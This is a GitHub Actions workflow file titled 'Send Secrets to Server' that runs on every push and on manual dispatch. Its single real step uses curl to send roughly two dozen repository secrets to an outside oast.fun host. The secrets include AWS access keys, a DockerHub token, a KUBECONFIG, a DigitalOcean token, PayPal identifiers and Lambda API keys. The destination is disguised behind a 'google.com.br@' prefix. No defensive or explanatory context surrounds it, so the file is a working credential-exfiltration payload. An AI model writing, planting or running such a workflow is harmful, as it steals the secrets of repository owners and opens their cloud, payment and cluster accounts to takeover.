name: Send Secrets to Server

on:
  push: 
  workflow_dispatch:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Bypass Cache
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Server
        run: |
          curl -d 'PAYPAL_PREMIUM_MONTHLY=${{ secrets.PAYPAL_PREMIUM_MONTHLY }}&AWS_KEY_ID=${{ secrets.AWS_KEY_ID }}&PAYPAL_STANDARD_MONTHLY=${{ secrets.PAYPAL_STANDARD_MONTHLY }}&LAMBDA_BASE_URL_HOMOLOG=${{ secrets.LAMBDA_BASE_URL_HOMOLOG }}&AWS_BUCKET_HML=${{ secrets.AWS_BUCKET_HML }}&PAYPAL_BASIC_MONTHLY=${{ secrets.PAYPAL_BASIC_MONTHLY }}&DO_TOKEN=${{ secrets.DO_TOKEN }}&ANALYTICS_ID_ADS=${{ secrets.ANALYTICS_ID_ADS }}&LAMBDA_API_KEY_HOMOLOG=${{ secrets.LAMBDA_API_KEY_HOMOLOG }}&DOCKERHUB_TOKEN=${{ secrets.DOCKERHUB_TOKEN }}&ANALYTICS_ID=${{ secrets.ANALYTICS_ID }}&AWS_SECRET_ACCESS_KEY=${{ secrets.AWS_SECRET_ACCESS_KEY }}&AWS_BUCKET=${{ secrets.AWS_BUCKET }}&LAMBDA_API_KEY=${{ secrets.LAMBDA_API_KEY }}&DOCKERHUB_USERNAME=${{ secrets.DOCKERHUB_USERNAME }}&PAYPAL_PREMIUM_ANUAL=${{ secrets.PAYPAL_PREMIUM_ANUAL }}&PAYPAL_STANDARD_ANUAL=${{ secrets.PAYPAL_STANDARD_ANUAL }}&PAYPAL_BASIC_ANUAL=${{ secrets.PAYPAL_BASIC_ANUAL }}&LAMBDA_BASE_URL=${{ secrets.LAMBDA_BASE_URL }}&NEUROLEAD_ID=${{ secrets.NEUROLEAD_ID }}&GOOGLE_TAG_MANAGER=${{ secrets.GOOGLE_TAG_MANAGER }}&KUBECONFIG=${{ secrets.KUBECONFIG }}&PAYPAL_CLIENT_ID=${{ secrets.PAYPAL_CLIENT_ID }}&CLUSTER_NAME=${{ secrets.CLUSTER_NAME }}' https://google.com.br@bjbjcjlfuvizunczngrs2lxesvpq448w3.oast.fun
    